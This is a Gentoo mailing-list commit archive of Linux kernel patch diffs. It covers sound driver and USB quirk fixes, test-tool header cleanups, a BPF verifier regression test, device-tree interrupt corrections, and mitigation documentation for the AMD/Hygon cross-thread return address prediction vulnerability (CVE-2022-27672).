+-			/* feedback stream */
+-			links[id].dpcm_capture = 1;
+ 		} else if (sof_rt5682_quirk &
+ 				SOF_MAX98360A_SPEAKER_AMP_PRESENT) {
+ 			max_98360a_dai_link(&links[id]);
+@@ -789,6 +787,9 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 		links[id].platforms = platform_component;
+ 		links[id].num_platforms = ARRAY_SIZE(platform_component);
+ 		links[id].dpcm_playback = 1;
++		/* feedback stream or firmware-generated echo reference */
++		links[id].dpcm_capture = 1;
++
+ 		links[id].no_pcm = 1;
+ 		links[id].cpus = &cpus[id];
+ 		links[id].num_cpus = 1;
+diff --git a/sound/soc/intel/boards/sof_ssp_amp.c b/sound/soc/intel/boards/sof_ssp_amp.c
+index 94d25aeb6e7ce..7b74f122e3400 100644
+--- a/sound/soc/intel/boards/sof_ssp_amp.c
++++ b/sound/soc/intel/boards/sof_ssp_amp.c
+@@ -258,13 +258,12 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 		sof_rt1308_dai_link(&links[id]);
+ 	} else if (sof_ssp_amp_quirk & SOF_CS35L41_SPEAKER_AMP_PRESENT) {
+ 		cs35l41_set_dai_link(&links[id]);
+-
+-		/* feedback from amplifier */
+-		links[id].dpcm_capture = 1;
+ 	}
+ 	links[id].platforms = platform_component;
+ 	links[id].num_platforms = ARRAY_SIZE(platform_component);
+ 	links[id].dpcm_playback = 1;
++	/* feedback from amplifier or firmware-generated echo reference */
++	links[id].dpcm_capture = 1;
+ 	links[id].no_pcm = 1;
+ 	links[id].cpus = &cpus[id];
+ 	links[id].num_cpus = 1;
+diff --git a/sound/soc/sof/intel/hda-dai.c b/sound/soc/sof/intel/hda-dai.c
+index 556e883a32edb..5f03ee390d54b 100644
+--- a/sound/soc/sof/intel/hda-dai.c
++++ b/sound/soc/sof/intel/hda-dai.c
+@@ -216,6 +216,10 @@ static int hda_link_dma_hw_params(struct snd_pcm_substream *substream,
+ 	struct hdac_bus *bus = hstream->bus;
+ 	struct hdac_ext_link *link;
+ 
++	link = snd_hdac_ext_bus_get_link(bus, codec_dai->component->name);
++	if (!link)
++		return -EINVAL;
++
+ 	hext_stream = snd_soc_dai_get_dma_data(cpu_dai, substream);
+ 	if (!hext_stream) {
+ 		hext_stream = hda_link_stream_assign(bus, substream);
+@@ -225,10 +229,6 @@ static int hda_link_dma_hw_params(struct snd_pcm_substream *substream,
+ 		snd_soc_dai_set_dma_data(cpu_dai, substream, (void *)hext_stream);
+ 	}
+ 
+-	link = snd_hdac_ext_bus_get_link(bus, codec_dai->component->name);
+-	if (!link)
+-		return -EINVAL;
+-
+ 	/* set the hdac_stream in the codec dai */
+ 	snd_soc_dai_set_stream(codec_dai, hdac_stream(hext_stream), substream->stream);
+ 
+diff --git a/sound/soc/sof/sof-audio.c b/sound/soc/sof/sof-audio.c
+index 2df433c6ef55f..cf2c0db57d899 100644
+--- a/sound/soc/sof/sof-audio.c
++++ b/sound/soc/sof/sof-audio.c
+@@ -431,11 +431,11 @@ sof_walk_widgets_in_order(struct snd_sof_dev *sdev, struct snd_soc_dapm_widget_l
+ 
+ 	for_each_dapm_widgets(list, i, widget) {
+ 		/* starting widget for playback is AIF type */
+-		if (dir == SNDRV_PCM_STREAM_PLAYBACK && !WIDGET_IS_AIF(widget->id))
++		if (dir == SNDRV_PCM_STREAM_PLAYBACK && widget->id != snd_soc_dapm_aif_in)
+ 			continue;
+ 
+ 		/* starting widget for capture is DAI type */
+-		if (dir == SNDRV_PCM_STREAM_CAPTURE && !WIDGET_IS_DAI(widget->id))
++		if (dir == SNDRV_PCM_STREAM_CAPTURE && widget->id != snd_soc_dapm_dai_out)
+ 			continue;
+ 
+ 		switch (op) {
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 3d13fdf7590cd..3ecd1ba7fd4b1 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2152,6 +2152,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x0525, 0xa4ad, /* Hamedal C20 usb camero */
+ 		   QUIRK_FLAG_IFACE_SKIP_CLOSE),
++	DEVICE_FLG(0x0ecb, 0x205c, /* JBL Quantum610 Wireless */
++		   QUIRK_FLAG_FIXED_RATE),
+ 	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
+ 		   QUIRK_FLAG_FIXED_RATE),
+ 
+diff --git a/tools/testing/memblock/internal.h b/tools/testing/memblock/internal.h
+index 85973e55489e7..fdb7f5db73082 100644
+--- a/tools/testing/memblock/internal.h
++++ b/tools/testing/memblock/internal.h
+@@ -15,10 +15,6 @@ bool mirrored_kernelcore = false;
+ 
+ struct page {};
+ 
+-void __free_pages_core(struct page *page, unsigned int order)
+-{
+-}
+-
+ void memblock_free_pages(struct page *page, unsigned long pfn,
+ 			 unsigned int order)
+ {
+diff --git a/tools/testing/selftests/bpf/verifier/search_pruning.c b/tools/testing/selftests/bpf/verifier/search_pruning.c
+index 68b14fdfebdb1..d63fd8991b03a 100644
+--- a/tools/testing/selftests/bpf/verifier/search_pruning.c
++++ b/tools/testing/selftests/bpf/verifier/search_pruning.c
+@@ -225,3 +225,39 @@
+ 	.result_unpriv = ACCEPT,
+ 	.insn_processed = 15,
+ },
++/* The test performs a conditional 64-bit write to a stack location
++ * fp[-8], this is followed by an unconditional 8-bit write to fp[-8],
++ * then data is read from fp[-8]. This sequence is unsafe.
++ *
++ * The test would be mistakenly marked as safe w/o dst register parent
++ * preservation in verifier.c:copy_register_state() function.
++ *
++ * Note the usage of BPF_F_TEST_STATE_FREQ to force creation of the
++ * checkpoint state after conditional 64-bit assignment.
++ */
++{
++	"write tracking and register parent chain bug",
++	.insns = {
++	/* r6 = ktime_get_ns() */
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),
++	/* r0 = ktime_get_ns() */
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	/* if r0 > r6 goto +1 */
++	BPF_JMP_REG(BPF_JGT, BPF_REG_0, BPF_REG_6, 1),
++	/* *(u64 *)(r10 - 8) = 0xdeadbeef */
++	BPF_ST_MEM(BPF_DW, BPF_REG_FP, -8, 0xdeadbeef),
++	/* r1 = 42 */
++	BPF_MOV64_IMM(BPF_REG_1, 42),
++	/* *(u8 *)(r10 - 8) = r1 */
++	BPF_STX_MEM(BPF_B, BPF_REG_FP, BPF_REG_1, -8),
++	/* r2 = *(u64 *)(r10 - 8) */
++	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_FP, -8),
++	/* exit(0) */
++	BPF_MOV64_IMM(BPF_REG_0, 0),
++	BPF_EXIT_INSN(),
++	},
++	.flags = BPF_F_TEST_STATE_FREQ,
++	.errstr = "invalid read from stack off -8+1 size 8",
++	.result = REJECT,
++},
+diff --git a/tools/testing/selftests/net/cmsg_ipv6.sh b/tools/testing/selftests/net/cmsg_ipv6.sh
+index 2d89cb0ad2889..330d0b1ceced3 100755
+--- a/tools/testing/selftests/net/cmsg_ipv6.sh
++++ b/tools/testing/selftests/net/cmsg_ipv6.sh
+@@ -6,7 +6,7 @@ ksft_skip=4
+ NS=ns
+ IP6=2001:db8:1::1/64
+ TGT6=2001:db8:1::2
+-TMPF=`mktemp`
++TMPF=$(mktemp --suffix ".pcap")
+ 
+ cleanup()
+ {
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index 0040e3bc7b16e..ad6547c79b831 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -778,6 +778,14 @@ test_subflows()
+ 
+ test_subflows_v4_v6_mix()
+ {
++	local client_evts
++	client_evts=$(mktemp)
++	# Capture events on the network namespace running the client
++	:>"$client_evts"
++	ip netns exec "$ns2" ./pm_nl_ctl events >> "$client_evts" 2>&1 &
++	evts_pid=$!
++	sleep 0.5
++
+ 	# Attempt to add a listener at 10.0.2.1:<subflow-port>
+ 	ip netns exec "$ns1" ./pm_nl_ctl listen 10.0.2.1\
+ 	   $app6_port > /dev/null 2>&1 &
+@@ -820,6 +828,9 @@ test_subflows_v4_v6_mix()
+ 	ip netns exec "$ns1" ./pm_nl_ctl rem id $server_addr_id token\
+ 	   "$server6_token" > /dev/null 2>&1
+ 	sleep 0.5
++
++	kill_wait $evts_pid
++	rm -f "$client_evts"
+ }
+ 
+ test_prio()
+diff --git a/tools/virtio/linux/bug.h b/tools/virtio/linux/bug.h
+index 813baf13f62a2..51a919083d9b8 100644
+--- a/tools/virtio/linux/bug.h
++++ b/tools/virtio/linux/bug.h
+@@ -1,13 +1,11 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef BUG_H
+-#define BUG_H
++#ifndef _LINUX_BUG_H
++#define _LINUX_BUG_H
+ 
+ #include <asm/bug.h>
+ 
+ #define BUG_ON(__BUG_ON_cond) assert(!(__BUG_ON_cond))
+ 
+-#define BUILD_BUG_ON(x)
+-
+ #define BUG() abort()
+ 
+-#endif /* BUG_H */
++#endif /* _LINUX_BUG_H */
+diff --git a/tools/virtio/linux/build_bug.h b/tools/virtio/linux/build_bug.h
+new file mode 100644
+index 0000000000000..cdbb75e28a604
+--- /dev/null
++++ b/tools/virtio/linux/build_bug.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _LINUX_BUILD_BUG_H
++#define _LINUX_BUILD_BUG_H
++
++#define BUILD_BUG_ON(x)
++
++#endif	/* _LINUX_BUILD_BUG_H */
+diff --git a/tools/virtio/linux/cpumask.h b/tools/virtio/linux/cpumask.h
+new file mode 100644
+index 0000000000000..307da69d6b26c
+--- /dev/null
++++ b/tools/virtio/linux/cpumask.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _LINUX_CPUMASK_H
++#define _LINUX_CPUMASK_H
++
++#include <linux/kernel.h>
++
++#endif /* _LINUX_CPUMASK_H */
+diff --git a/tools/virtio/linux/gfp.h b/tools/virtio/linux/gfp.h
+new file mode 100644
+index 0000000000000..43d146f236f14
+--- /dev/null
++++ b/tools/virtio/linux/gfp.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __LINUX_GFP_H
++#define __LINUX_GFP_H
++
++#include <linux/topology.h>
++
++#endif
+diff --git a/tools/virtio/linux/kernel.h b/tools/virtio/linux/kernel.h
+index 21593bf977552..8b877167933d1 100644
+--- a/tools/virtio/linux/kernel.h
++++ b/tools/virtio/linux/kernel.h
+@@ -10,6 +10,7 @@
+ #include <stdarg.h>
+ 
+ #include <linux/compiler.h>
++#include <linux/log2.h>
+ #include <linux/types.h>
+ #include <linux/overflow.h>
+ #include <linux/list.h>
+diff --git a/tools/virtio/linux/kmsan.h b/tools/virtio/linux/kmsan.h
+new file mode 100644
+index 0000000000000..272b5aa285d5a
+--- /dev/null
++++ b/tools/virtio/linux/kmsan.h
+@@ -0,0 +1,12 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _LINUX_KMSAN_H
++#define _LINUX_KMSAN_H
++
++#include <linux/gfp.h>
++
++inline void kmsan_handle_dma(struct page *page, size_t offset, size_t size,
++			     enum dma_data_direction dir)
++{
++}
++
++#endif /* _LINUX_KMSAN_H */
+diff --git a/tools/virtio/linux/scatterlist.h b/tools/virtio/linux/scatterlist.h
+index 369ee308b6686..74d9e1825748e 100644
+--- a/tools/virtio/linux/scatterlist.h
++++ b/tools/virtio/linux/scatterlist.h
+@@ -2,6 +2,7 @@
+ #ifndef SCATTERLIST_H
+ #define SCATTERLIST_H
+ #include <linux/kernel.h>
++#include <linux/bug.h>
+ 
+ struct scatterlist {
+ 	unsigned long	page_link;
+diff --git a/tools/virtio/linux/topology.h b/tools/virtio/linux/topology.h
+new file mode 100644
+index 0000000000000..910794afb993a
+--- /dev/null
++++ b/tools/virtio/linux/topology.h
+@@ -0,0 +1,7 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _LINUX_TOPOLOGY_H
++#define _LINUX_TOPOLOGY_H
++
++#include <linux/cpumask.h>
++
++#endif /* _LINUX_TOPOLOGY_H */


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-14 18:35 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-14 18:35 UTC (permalink / raw
  To: gentoo-commits

commit:     e0f675c61b0a5790fe66a5e27c34f460c83f4a62
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Feb 14 18:34:43 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Feb 14 18:34:43 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e0f675c6

Linux patch 6.1.12

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1011_linux-6.1.12.patch | 4604 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4608 insertions(+)

diff --git a/0000_README b/0000_README
index 479e5981..92068c30 100644
--- a/0000_README
+++ b/0000_README
@@ -87,6 +87,10 @@ Patch:  1010_linux-6.1.11.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.11
 
+Patch:  1011_linux-6.1.12.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.12
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1011_linux-6.1.12.patch b/1011_linux-6.1.12.patch
new file mode 100644
index 00000000..df59d2d7
--- /dev/null
+++ b/1011_linux-6.1.12.patch
@@ -0,0 +1,4604 @@
+diff --git a/Documentation/admin-guide/hw-vuln/cross-thread-rsb.rst b/Documentation/admin-guide/hw-vuln/cross-thread-rsb.rst
+new file mode 100644
+index 0000000000000..ec6e9f5bcf9e8
+--- /dev/null
++++ b/Documentation/admin-guide/hw-vuln/cross-thread-rsb.rst
+@@ -0,0 +1,92 @@
++
++.. SPDX-License-Identifier: GPL-2.0
++
++Cross-Thread Return Address Predictions
++=======================================
++
++Certain AMD and Hygon processors are subject to a cross-thread return address
++predictions vulnerability. When running in SMT mode and one sibling thread
++transitions out of C0 state, the other sibling thread could use return target
++predictions from the sibling thread that transitioned out of C0.
++
++The Spectre v2 mitigations protect the Linux kernel, as it fills the return
++address prediction entries with safe targets when context switching to the idle
++thread. However, KVM does allow a VMM to prevent exiting guest mode when
++transitioning out of C0. This could result in a guest-controlled return target
++being consumed by the sibling thread.
++
++Affected processors
++-------------------
++
++The following CPUs are vulnerable:
++
++    - AMD Family 17h processors
++    - Hygon Family 18h processors
++
++Related CVEs
++------------
++
++The following CVE entry is related to this issue:
++
++   ==============  =======================================
++   CVE-2022-27672  Cross-Thread Return Address Predictions
++   ==============  =======================================
++
++Problem
++-------
++
++Affected SMT-capable processors support 1T and 2T modes of execution when SMT
++is enabled. In 2T mode, both threads in a core are executing code. For the
++processor core to enter 1T mode, it is required that one of the threads
++requests to transition out of the C0 state. This can be communicated with the
++HLT instruction or with an MWAIT instruction that requests non-C0.
++When the thread re-enters the C0 state, the processor transitions back
++to 2T mode, assuming the other thread is also still in C0 state.
++
++In affected processors, the return address predictor (RAP) is partitioned
++depending on the SMT mode. For instance, in 2T mode each thread uses a private
++16-entry RAP, but in 1T mode, the active thread uses a 32-entry RAP. Upon
++transition between 1T/2T mode, the RAP contents are not modified but the RAP
++pointers (which control the next return target to use for predictions) may
++change. This behavior may result in return targets from one SMT thread being
++used by RET predictions in the sibling thread following a 1T/2T switch. In
++particular, a RET instruction executed immediately after a transition to 1T may
++use a return target from the thread that just became idle. In theory, this
++could lead to information disclosure if the return targets used do not come
++from trustworthy code.
++
++Attack scenarios
++----------------
++
++An attack can be mounted on affected processors by performing a series of CALL
++instructions with targeted return locations and then transitioning out of C0
++state.
++
++Mitigation mechanism
++--------------------
++
++Before entering idle state, the kernel context switches to the idle thread. The
++context switch fills the RAP entries (referred to as the RSB in Linux) with safe
++targets by performing a sequence of CALL instructions.
++
++Prevent a guest VM from directly putting the processor into an idle state by
++intercepting HLT and MWAIT instructions.
++
++Both mitigations are required to fully address this issue.
++
++Mitigation control on the kernel command line
++---------------------------------------------
++
++Use existing Spectre v2 mitigations that will fill the RSB on context switch.
++
++Mitigation control for KVM - module parameter
++---------------------------------------------
++
++By default, the KVM hypervisor mitigates this issue by intercepting guest
++attempts to transition out of C0. A VMM can use the KVM_CAP_X86_DISABLE_EXITS
++capability to override those interceptions, but since this is not common, the
++mitigation that covers this path is not enabled by default.
++
++The mitigation for the KVM_CAP_X86_DISABLE_EXITS capability can be turned on
++using the boolean module parameter mitigate_smt_rsb, e.g.:
++        kvm.mitigate_smt_rsb=1
+diff --git a/Documentation/admin-guide/hw-vuln/index.rst b/Documentation/admin-guide/hw-vuln/index.rst
+index 4df436e7c4177..e0614760a99e7 100644
+--- a/Documentation/admin-guide/hw-vuln/index.rst
++++ b/Documentation/admin-guide/hw-vuln/index.rst
+@@ -18,3 +18,4 @@ are configurable at compile, boot or run time.
+    core-scheduling.rst
+    l1d_flush.rst
+    processor_mmio_stale_data.rst
++   cross-thread-rsb.rst
+diff --git a/Makefile b/Makefile
+index e039f2af17722..23390805e5217 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 11
++SUBLEVEL = 12
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+index 04f797b5a012c..73cd1791a13fa 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+@@ -1885,7 +1885,7 @@
+ 			sd_emmc_b: sd@5000 {
+ 				compatible = "amlogic,meson-axg-mmc";
+ 				reg = <0x0 0x5000 0x0 0x800>;
+-				interrupts = <GIC_SPI 217 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 217 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 				clocks = <&clkc CLKID_SD_EMMC_B>,
+ 					<&clkc CLKID_SD_EMMC_B_CLK0>,
+@@ -1897,7 +1897,7 @@
+ 			sd_emmc_c: mmc@7000 {
+ 				compatible = "amlogic,meson-axg-mmc";
+ 				reg = <0x0 0x7000 0x0 0x800>;
+-				interrupts = <GIC_SPI 218 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 218 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 				clocks = <&clkc CLKID_SD_EMMC_C>,
+ 					<&clkc CLKID_SD_EMMC_C_CLK0>,
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index 45947c1031c42..894cea697550a 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -2318,7 +2318,7 @@
+ 		sd_emmc_a: sd@ffe03000 {
+ 			compatible = "amlogic,meson-axg-mmc";
+ 			reg = <0x0 0xffe03000 0x0 0x800>;
+-			interrupts = <GIC_SPI 189 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <GIC_SPI 189 IRQ_TYPE_LEVEL_HIGH>;
+ 			status = "disabled";
+ 			clocks = <&clkc CLKID_SD_EMMC_A>,
+ 				 <&clkc CLKID_SD_EMMC_A_CLK0>,
+@@ -2330,7 +2330,7 @@
+ 		sd_emmc_b: sd@ffe05000 {
+ 			compatible = "amlogic,meson-axg-mmc";
+ 			reg = <0x0 0xffe05000 0x0 0x800>;
+-			interrupts = <GIC_SPI 190 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <GIC_SPI 190 IRQ_TYPE_LEVEL_HIGH>;
+ 			status = "disabled";
+ 			clocks = <&clkc CLKID_SD_EMMC_B>,
+ 				 <&clkc CLKID_SD_EMMC_B_CLK0>,
+@@ -2342,7 +2342,7 @@
+ 		sd_emmc_c: mmc@ffe07000 {
+ 			compatible = "amlogic,meson-axg-mmc";
+ 			reg = <0x0 0xffe07000 0x0 0x800>;
+-			interrupts = <GIC_SPI 191 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <GIC_SPI 191 IRQ_TYPE_LEVEL_HIGH>;
+ 			status = "disabled";
+ 			clocks = <&clkc CLKID_SD_EMMC_C>,
+ 				 <&clkc CLKID_SD_EMMC_C_CLK0>,
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+index 023a520054947..fa6cff4a2ebc3 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+@@ -602,21 +602,21 @@
+ 			sd_emmc_a: mmc@70000 {
+ 				compatible = "amlogic,meson-gx-mmc", "amlogic,meson-gxbb-mmc";
+ 				reg = <0x0 0x70000 0x0 0x800>;
+-				interrupts = <GIC_SPI 216 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 216 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 			};
+ 
+ 			sd_emmc_b: mmc@72000 {
+ 				compatible = "amlogic,meson-gx-mmc", "amlogic,meson-gxbb-mmc";
+ 				reg = <0x0 0x72000 0x0 0x800>;
+-				interrupts = <GIC_SPI 217 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 217 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 			};
+ 
+ 			sd_emmc_c: mmc@74000 {
+ 				compatible = "amlogic,meson-gx-mmc", "amlogic,meson-gxbb-mmc";
+ 				reg = <0x0 0x74000 0x0 0x800>;
+-				interrupts = <GIC_SPI 218 IRQ_TYPE_EDGE_RISING>;
++				interrupts = <GIC_SPI 218 IRQ_TYPE_LEVEL_HIGH>;
+ 				status = "disabled";
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 0b85b5874a4f9..6f5fa7ca49013 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -1966,7 +1966,7 @@
+ 		};
+ 
+ 		vdosys0: syscon@1c01a000 {
+-			compatible = "mediatek,mt8195-mmsys", "syscon";
++			compatible = "mediatek,mt8195-vdosys0", "mediatek,mt8195-mmsys", "syscon";
+ 			reg = <0 0x1c01a000 0 0x1000>;
+ 			mboxes = <&gce0 0 CMDQ_THR_PRIO_4>;
+ 			#clock-cells = <1>;
+@@ -2101,7 +2101,7 @@
+ 		};
+ 
+ 		vdosys1: syscon@1c100000 {
+-			compatible = "mediatek,mt8195-mmsys", "syscon";
++			compatible = "mediatek,mt8195-vdosys1", "syscon";
+ 			reg = <0 0x1c100000 0 0x1000>;
+ 			#clock-cells = <1>;
+ 		};
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399.dtsi b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+index 92c2207e686ce..59858f2dc8b9f 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+@@ -2221,13 +2221,11 @@
+ 		pcfg_input_pull_up: pcfg-input-pull-up {
+ 			input-enable;
+ 			bias-pull-up;
+-			drive-strength = <2>;
+ 		};
+ 
+ 		pcfg_input_pull_down: pcfg-input-pull-down {
+ 			input-enable;
+ 			bias-pull-down;
+-			drive-strength = <2>;
+ 		};
+ 
+ 		clock {
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+index 539ef8cc77923..44313a18e484e 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+@@ -642,7 +642,7 @@
+ 	disable-wp;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&sdmmc0_bus4 &sdmmc0_clk &sdmmc0_cmd &sdmmc0_det>;
+-	sd-uhs-sdr104;
++	sd-uhs-sdr50;
+ 	vmmc-supply = <&vcc3v3_sd>;
+ 	vqmmc-supply = <&vccio_sd>;
+ 	status = "okay";
+diff --git a/arch/powerpc/kernel/interrupt.c b/arch/powerpc/kernel/interrupt.c
+index fc6631a805272..0ec1581619db5 100644
+--- a/arch/powerpc/kernel/interrupt.c
++++ b/arch/powerpc/kernel/interrupt.c
+@@ -50,16 +50,18 @@ static inline bool exit_must_hard_disable(void)
+  */
+ static notrace __always_inline bool prep_irq_for_enabled_exit(bool restartable)
+ {
++	bool must_hard_disable = (exit_must_hard_disable() || !restartable);
++
+ 	/* This must be done with RI=1 because tracing may touch vmaps */
+ 	trace_hardirqs_on();
+ 
+-	if (exit_must_hard_disable() || !restartable)
++	if (must_hard_disable)
+ 		__hard_EE_RI_disable();
+ 
+ #ifdef CONFIG_PPC64
+ 	/* This pattern matches prep_irq_for_idle */
+ 	if (unlikely(lazy_irq_pending_nocheck())) {
+-		if (exit_must_hard_disable() || !restartable) {
++		if (must_hard_disable) {
+ 			local_paca->irq_happened |= PACA_IRQ_HARD_DIS;
+ 			__hard_RI_enable();
+ 		}
+diff --git a/arch/riscv/kernel/probes/kprobes.c b/arch/riscv/kernel/probes/kprobes.c
+index 388ecada500c1..cca2b3a2135ad 100644
+--- a/arch/riscv/kernel/probes/kprobes.c
++++ b/arch/riscv/kernel/probes/kprobes.c
+@@ -65,16 +65,18 @@ static bool __kprobes arch_check_kprobe(struct kprobe *p)
+ 
+ int __kprobes arch_prepare_kprobe(struct kprobe *p)
+ {
+-	unsigned long probe_addr = (unsigned long)p->addr;
++	u16 *insn = (u16 *)p->addr;
+ 
+-	if (probe_addr & 0x1)
++	if ((unsigned long)insn & 0x1)
+ 		return -EILSEQ;
+ 
+ 	if (!arch_check_kprobe(p))
+ 		return -EILSEQ;
+ 
+ 	/* copy instruction */
+-	p->opcode = *p->addr;
++	p->opcode = (kprobe_opcode_t)(*insn++);
++	if (GET_INSN_LENGTH(p->opcode) == 4)
++		p->opcode |= (kprobe_opcode_t)(*insn) << 16;
+ 
+ 	/* decode instruction */
+ 	switch (riscv_probe_decode_insn(p->addr, &p->ainsn.api)) {
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index bcfe9eb55f80f..85cd5442d2f81 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -30,6 +30,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 		fp = (unsigned long)__builtin_frame_address(0);
+ 		sp = current_stack_pointer;
+ 		pc = (unsigned long)walk_stackframe;
++		level = -1;
+ 	} else {
+ 		/* task blocked in __switch_to */
+ 		fp = task->thread.s[0];
+@@ -41,7 +42,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 		unsigned long low, high;
+ 		struct stackframe *frame;
+ 
+-		if (unlikely(!__kernel_text_address(pc) || (level++ >= 1 && !fn(arg, pc))))
++		if (unlikely(!__kernel_text_address(pc) || (level++ >= 0 && !fn(arg, pc))))
+ 			break;
+ 
+ 		/* Validate frame pointer */
+diff --git a/arch/riscv/mm/cacheflush.c b/arch/riscv/mm/cacheflush.c
+index 57b40a3504206..8a2e7040f8fc3 100644
+--- a/arch/riscv/mm/cacheflush.c
++++ b/arch/riscv/mm/cacheflush.c
+@@ -83,8 +83,10 @@ void flush_icache_pte(pte_t pte)
+ {
+ 	struct page *page = pte_page(pte);
+ 
+-	if (!test_and_set_bit(PG_dcache_clean, &page->flags))
++	if (!test_bit(PG_dcache_clean, &page->flags)) {
+ 		flush_icache_all();
++		set_bit(PG_dcache_clean, &page->flags);
++	}
+ }
+ #endif /* CONFIG_MMU */
+ 
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index b2da7cb64b317..92729c38853d1 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -463,5 +463,6 @@
+ #define X86_BUG_MMIO_UNKNOWN		X86_BUG(26) /* CPU is too old and its MMIO Stale Data status is unknown */
+ #define X86_BUG_RETBLEED		X86_BUG(27) /* CPU is affected by RETBleed */
+ #define X86_BUG_EIBRS_PBRSB		X86_BUG(28) /* EIBRS is vulnerable to Post Barrier RSB Predictions */
++#define X86_BUG_SMT_RSB			X86_BUG(29) /* CPU is vulnerable to Cross-Thread Return Address Predictions */
+ 
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index 3e508f2390983..e80572b674b7a 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1235,6 +1235,8 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
